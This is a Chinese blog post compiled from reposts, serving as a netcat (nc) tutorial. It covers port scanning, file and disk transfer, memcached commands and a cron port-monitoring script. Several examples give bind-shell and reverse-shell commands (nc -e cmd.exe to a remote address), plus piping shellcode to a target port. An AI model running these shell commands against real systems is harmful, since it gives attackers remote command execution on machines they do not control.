Chinaunix首页 | 论坛 | 博客
  • 博客访问: 6457134
  • 博文数量: 579
  • 博客积分: 1548
  • 博客等级: 上尉
  • 技术积分: 16635
  • 用 户 组: 普通用户
  • 注册时间: 2012-12-12 15:29
个人简介

http://www.csdn.net/ http://www.arm.com/zh/ https://www.kernel.org/ http://www.linuxpk.com/ http://www.51develop.net/ http://linux.chinaitlab.com/ http://www.embeddedlinux.org.cn http://bbs.pediy.com/

文章分类

全部博文(579)

文章存档

2018年(18)

2015年(91)

2014年(159)

2013年(231)

2012年(80)

分类: LINUX

2014-09-03 11:48:06

功能说明:强大的网络工具
语  法:nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...]
参  数:

  -g<
网关>  设置路由器跃程通信网关,最多可设置8个。
  -G<
指向器数目>  设置来源路由指向器,其数值为4的倍数。
  -h  
 在线帮助。
  -i<
延迟秒数>  设置时间间隔,以便传送信息及扫描通信端口。
  -l  
 使用监听模式,管控传入的资料。
  -n  
 直接使用IP地址,而不通过域名服务器。
  -o<
输出文件>  指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
  -p<
通信端口>  设置本地主机使用的通信端口。
  -r  
 乱数指定本地与远端主机的通信端口。
  -s<
来源位址>  设置本地主机送出数据包的IP地址。
  -u  
 使用UDP传输协议。
  -v  
 显示指令执行过程。
  -w<
超时秒数>  设置等待连线的时间。
  -z  
 使用0输入/输出模式,只在扫描通信端口时使用。

linux nc (netcat)最新版源码下载及nc命令详解

 

扩展资料一: nc简单使用示例

简单用法举例
1.端口扫描
# nc -v -w 2 192.168.2.34 -z 21-24
nc: connect to 192.168.2.34 port 21 (tcp
) failed: Connection refused
Connection to 192.168.2.34 22 port [tcp/ssh]succeeded!
nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused

2.从192.168.2.33拷贝文件到192.168.2.34
192.168.2.34上:
 nc -lp 1234 > test.txt
192.168.2.33上: nc 192.168.2.34 1234 < test.txt

3.简单聊天工具
192.168.2.34上: nc -l 1234
192.168.2.33上:
 nc 192.168.2.34 1234
这样,双方就可以相互交流了。使用ctrl+C(D)退出。

4.用nc命令操作memcached
1)存储数据:printf "setkey 0 10 6rnresultrn” |nc 192.168.2.34 11211
2)获取数据:
printf “get keyrn” |nc 192.168.2.34 11211
3
)删除数据:
printf “delete keyrn” |nc 192.168.2.34 11211
4
)查看状态:printf "statsrn” |nc 192.168.2.34 11211
5)模拟top命令查看状态:
watch “echo stats” |nc 192.168.2.34 11211
6
)清空缓存:printf “flush_allrn” |nc 192.168.2.34 11211 (小心操作,清空了缓存就没了)

nc -l 1234

nc 127.0.0.1 1234


在端口1234建立连接,互相发送输入
nc -p 1234 -w 5 host.exa
mple.com 80


建立从本地1234端口到host.example.com80端口连接,5秒超时
nc -u host.example.com 53
u
UDP连接

echo -n "GET / HTTP/1.0"r"n"r"n" | nc host.example.com 80
连接到主机并执行
nc -v -z host.example.com 70-80
扫描端口(7080),可指定范围。-v输出详细信息。 

5.连接到远程主机
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
6.监听本地主机
格式:nc -l -p 80
讲解:监听本机的TCP80端口
7.扫描远程主机
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
8.REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
9.REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
10.作攻击程序用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
附:'c:\exploit.txt'为shellcode等
11.作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
12.作蜜罐用[2],例子:
格式:nc -L -p 80 > c:\log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把‘>'
  改为‘>>'即可以追加日志
附:'c:\log.txt'为日志等
13.作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:\honeypot.txt
格式2:type.exe c:\honeypot.txt|nc -L -p 80
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容‘送'入其管道中!
14.备份档案
A机的资料夹 /data备份到B主机的backup.tgz
源主机: tar czf - work|nc -l -c -p 1234
目的主机: nc 192.168.0.1 1234 >a.tgz

A:tar -zcf data|nc -l -p 4444
B:nc a 4444 >backup.tgz
传完后ctrl+c中断连接,这样A主机不会生成档案直接传到了backup.tgz,缺点就是不知道啥时候传完,嘿嘿

 

扩展资料二:命令linux nc命令传输文件

nc到底干嘛用的我不多描述,今天主要讲下用nc传输文件。由于公司的设备sudo后没有sshscp等远程接入命令,或host.deny里面设置了sshdeny,不管怎样的原因。我今天跨过大家常用的scp,来说明下一个更有用的轻量级工具,nc的另一个强大的功---文件传输。
范例如下:
目的主机监听
nc -l
 监听端口  >要接收的文件名
nc -l 4444 > cache.tar.gz

源主机发起请求
nc 
 目的主机ip   目的端口
nc  192.168.0.85  4444 

netstat如下
[root@localhost jiangbao]# netstat -tpln
tcp        0      0 0.0.0.0:4444                0.0.0.0:*                   LISTEN      18166/nc 
英文描述如下
DATA TRANSFER
Start by using nc to listen on a specific port, with output captured into a file:

$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file which
is to be transferred:
$ nc host.example.com 1234

 

扩展资料三: linux nc (NetCat)命令详解,这篇文章对nc的介绍非常详细,和以上资料有部分重复.

一、版本

通常的Linux发行版中都带有NetCat(简称nc),甚至在拯救模式光盘中也由busybox提供了简版的nc工具。但不同的版本,其参数的使用略有差异。
NetCat
 官方地址:

引用

[root@hatest1 ~]# cat /etc/asianux-release
Asianux release 2.0 (Trinity SP2)
[root@hatest1 ~]# cat /etc/redfl
ag-release
Red Flag DC Server release 5.0 (Trinity SP2)
[root@hatest1 ~]# type -a nc
nc is /usr/bin/nc
[root@hatest1 ~]# rpm -q nc
nc-1.10-22
建议在使用前,先用man nc看看帮助。这里以红旗DC Server 5.0上的1.10版本进行简单说明。

假设两服务器信息:

引用

server1: 192.168.228.221
server2: 192.168.228.222


二、常见使用

1、远程拷贝文件
server1拷贝文件到server2上。需要先在server2上,用nc激活监听,server2上运行:

[root@hatest2 tmp]# nc -lp 1234 > install.log
server1
上运行:

引用

[root@hatest1 ~]# ll install.log
-rw-r–r–   1 root root 39693 12
 20   2007 install.log
[root@hatest1 ~]# nc -w 1 192.168.228.222 1234 < install.log

2、克隆硬盘或分区
操作与上面的拷贝是雷同的,只需要由获得硬盘或分区的数据,然后传输即可。
克隆硬盘或分区的操作,不应在已经mount的的系统上进行。所以,需要使用安装光盘引导后,进入拯救模式(或使用Knoppix具光盘)启动系统后,在server2上进行类似的监听动作:

# nc -l -p 1234 | dd of=/dev/sda

server1上执行传输,即可完成从server1克隆sda硬盘到server2的任务:

# dd if=/dev/sda | nc 192.168.228.222 1234

完成上述工作的前提,是需要落实光盘的拯救模式支持服务器上的网卡,并正确配置IP

3、端口扫描
可以执行:

引用

# nc -v -w 1 192.168.228.222 -z 1-1000
hatest2 [192.168.228.222] 22 (ssh) open

4、保存Web页面

# while true; do nc -l -p 80 -q 1 < somepage.html; done

5、模拟HTTP Headers

引用

[root@hatest1 ~]# nc 80

GET / HTTP/1.1
Host: ispconfig.org
Referrer: mypage.com
User-Agent: my-browser

 

HTTP/1.1 200 OK
Date: Tue, 16 Dec 2008 07:23:24 GMT
Server: Apache/2.2.6 (Unix) DAV/2 mod_mono/1.2.1 mod_python/3.2.8 Python/2.4.3 mod_perl/2.0.2 Perl/v5.8.8
Set-Cookie: PHPSESSID=bbadorbvie1gn037iih6lrdg50; path=/
Expires: 0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Set-Cookie: oWn_sid=xRutAY; expires=Tue, 23-Dec-2008 07:23:24 GMT; path=/
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html
[......]
nc命令后,输入红色部分的内容,然后按两次回车,即可从对方获得HTTP Headers内容。

6、聊天
nc
还可以作为简单的字符下聊天工具使用,同样的,server2上需要启动监听:

[root@hatest2 tmp]# nc -lp 1234

server1上传输:

[root@hatest1 ~]# nc 192.168.228.222 1234

这样,双方就可以相互交流了。使用Ctrl+D正常退出。

7、传输目录
server1拷贝nginx-0.6.34目录内容到server2上。需要先在server2上,用nc激活监听,server2上运行:

引用

[root@hatest2 tmp]# nc -l 1234 |tar xzvf -
server1
上运行:

引用

[root@hatest1 ~]# ll -d nginx-0.6.34
drwxr-xr-x 8 1000 1000 4096 12-23 17:25 nginx-0.6.34
[root@hatest1 ~]# tar czvf – nginx-0.6.34|nc 192.168.228.222 1234

8、参数简介
这仅是一个1.10版本的简单说明,详细的参数使用还是需要看man

引用

想要连接到某处: nc [-options] hostname port[s] [ports] …
绑定端口等待连接
: nc -l -p port [-options] [hostname] [port]
参数
:
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h
 帮助信息

-i secs
 延时的间隔
-l
 监听模式,用于入站连接
-n
 指定数字的IP地址,不能用hostname
-o file
 记录16进制的传输

-p port
 本地端口号
-r
 任意指定本地及远程端口
-s addr
 本地源地址
-u UDP
模式
-v
 详细输出——用两个-v可得到更详细的内容
-w secs timeout
的时间
-z
 将输入输出关掉——用于扫描时,其中端口号可以指定一个或者用lo-hi式的指定范围。

三、版本差异
不用系统上提供的nc版本会有说不同,其提供的参数使用方法也略有差异。
例如,红旗Asianux 3.0 SP1拯救光盘上的版本是供使用的参数仅有一部分:

引用

# nc -h
BusyBox v1.2.0 (2008.04.14-01:35+0000) multi-call binary

Usage: nc [OPTIONS] [IP] [port]

Netcat opens a pipe to IP:port

Options:
         -l               listen mode, for inbound connects
         -p PORT         local port number
         -i SECS         delay interval for lines sent
         -e PROG         program to exec after connect (dangerous!)
         -w SECS         timeout for connects and final net reads
而在Asianux 3.0 SP1系统中提供的nc版本则是1.84的,按上面的参数用法写会执行不了:

引用

[root@ftpserver ~]# rpm -q nc
nc-1.84-10
[root@ftpserver ~]# nc -lp 1234
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
           [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
           [-x proxy_address[:port]] [hostname] [port[s]]
讲查看man文档,可见在这个版本中,-l是不能与-s-p-z一起使用的,-w参数也会被忽略,所以,正确的用法是:

[root@ftpserver tmp]# nc -l 1234

四、用在脚本中
nc
每次启动监听后,都会在客户端连接完成并退出的同时,服务端一同退出。所以,如果需要不断的使用nc进行数据传输,需要在脚本中使用循环。利用nc现更多的功能,可参考其rpm提供的参考脚本:

引用

# rpm -qd nc
/usr/share/doc/nc-1.10/Changelog
/usr/share/doc/nc-1.10/README
/usr/share/doc/nc-1.10/scripts/README
/usr/share/doc/nc-1.10/scripts/alta
/usr/share/doc/nc-1.10/scripts/bsh
/usr/share/doc/nc-1.10/scripts/dist.sh
/usr/share/doc/nc-1.10/scripts/irc

/usr/share/doc/nc-1.10/scripts/iscan
/usr/share/doc/nc-1.10/scripts/ncp
/usr/share/doc/nc-1.10/scripts/probe
/usr/share/doc/nc-1.10/scripts/web
/usr/share/doc/nc-1.10/scripts/webproxy
/usr/share/doc/nc-1.10/scripts/webrelay
/usr/share/doc/nc-1.10/scripts/websearch
/usr/share/man/man1/nc.1.gz


例1:扫描指定的8080端口
nc -v -w 10 -z 192.168.0.100 8080  
Connection to 192.168.0.100 8080 port [tcp/http] succeeded!

例2:扫描20到25的端口范围,并详细输出。
# nc -v -w 2 -z 192.168.0.100 20-25   
nc: connect to 192.168.0.100 port 20 (tcp) failed: Connection refused
nc: connect to 192.168.0.100 port 21 (tcp) failed: Connection refused
Connection to 192.168.0.100 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.0.100 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.0.100  port 24 (tcp) failed: Connection refused
nc: connect to 192.168.0.100 port 25 (tcp) failed: Connection refused

例3:扫描1到65535的端口范围,只输出打开的端口(去掉-v参数即可)
# nc -w 1 -z 192.168.0.100 1-65535 
Connection to 192.168.0.100 22 port [tcp/ssh] succeeded!
Connection to 192.168.0.100 80 port [tcp/http] succeeded!
Connection to 192.168.0.100 2121 port [tcp/scientia-ssdb] succeeded!
Connection to 192.168.0.100 4004 port [tcp/pxc-roid] succeeded!
Connection to 192.168.0.100 8081 port [tcp/tproxy] succeeded!
Connection to 192.168.0.100 11211 port [tcp/*] succeeded!

二、批量检测服务器指定端口开放情况:

1、假如我们要监控一堆指定的IP和端口,可新建一个文件(第1列服务器IP,第2列要监控的端口)。
vim /scripts/ip-ports.txt

点击(此处)折叠或打开

  1. 192.168.0.100 80
  2. 192.168.0.100 8081
  3. 192.168.0.101 8082
  4. 192.168.1.100 21


2、我们可以写这样一个脚本来批量检测端口是否开放:

vim /scripts/ncports.sh

点击(此处)折叠或打开

  1. #!/bin/bash
  2. #检测服务器端口是否开放,成功会返回0值显示ok,失败会返回1值显示fail
  3.   
  4. cat /scripts/ip-ports.txt | while read line
  5. do
  6.   nc -w 10 -z $line > /dev/null 2>&1
  7.   if [ $? -eq 0 ]
  8.   then
  9.     echo $line:ok
  10.   else
  11.     echo $line:fail
  12.   fi
  13. done


3、执行脚本查看运行结果如下:
# chmod a+x  /scripts/ncports.sh
# /scripts/ncports.sh

192.168.0.100 80:ok
192.168.0.100 8081:ok
192.168.0.101 8082:ok
192.168.1.100 21:fail

 

三、端口不通时设置告警:

1、 邮件告警:

 (1) 先安装linux下面的邮件发送程序mutt(参见我另一篇文章《Linux下面如何用mutt命令发送邮件

 (2) 修改上面的ncports.sh检测脚本,在显示失败fail的时候增加一行:
       ……………………
      echo $line :fail
      echo "服务器 $line 端口不通,请尽快处理!" | mutt -s "【机房监控】服务器$line端口不通" 
      ……………………

(3) 如果上面的接收邮箱设置为移动139邮箱,并开启接收邮件短信告知,即可实现“短信告警”的功能。

2、 windows消息弹窗告警:

(1) 先打开接收消息弹窗windows客户机的“Messenger”服务,设置为“启动”

(2) 利用smbclient命令来发送消息,net脚本文件如下:
 # vim /scripts/net.sh

点击(此处)折叠或打开

  1. #!/bin/bash
  2. #/scripts/net.sh
  3. case "$1" in
  4. send)
  5. echo "$3"|smbclient -I "$2" -M `nmblookup -A "$2"|sed -e '1d' -e '3,/*/d'|cut -f2|cut -d' ' -f1`
  6. ;;
  7. *)
  8. echo "Usage:net send "
  9. exit 1
  10. esac
# chmod a+x /scripts/net.sh

(3) 发送消息弹窗命令测试:(发送给192.168.1.83这台win xp机子,发送内容不支持中文)
# /scripts/net.sh  send  192.168.1.83     "hello,nihao"

 

3、端口不通时发送邮件并消息弹窗告警的脚本如下:
# vim /scripts/ncports.sh

点击(此处)折叠或打开

  1. #!/bin/bash
  2. #检测服务器端口是否开放,成功会返回0值,打不开会返回1值
  3. cat /scripts/ip-ports.txt | while read line
  4. do
  5.   nc -w 10 -z $line > /dev/null 2>&1
  6.   if [ $? -eq 0 ]
  7.   then
  8.     echo $line:ok
  9.   else
  10.     echo $line:fail
  11.     echo "服务器 $line 端口不通,请尽快处理!" | mutt -s "【机房监控】服务器$line端口不通" test@139.com
  12.     /scripts/net.sh send 192.168.1.83 "The $line fail"
  13.   fi
  14. done

4、加入任务计划每2分钟执行一次

# crontab -e

点击(此处)折叠或打开

  1. */2 * * * * /scripts/ncports.sh > /dev/null 2>&1

# service crond restart



转载地址:
1,http://huangrs.blog.51cto.com/2677571/967512/
2,http://blog.sina.com.cn/s/blog_3f297c5c01015tdc.html


阅读(3942) | 评论(0) | 转发(1) |
给主人留下些什么吧!~~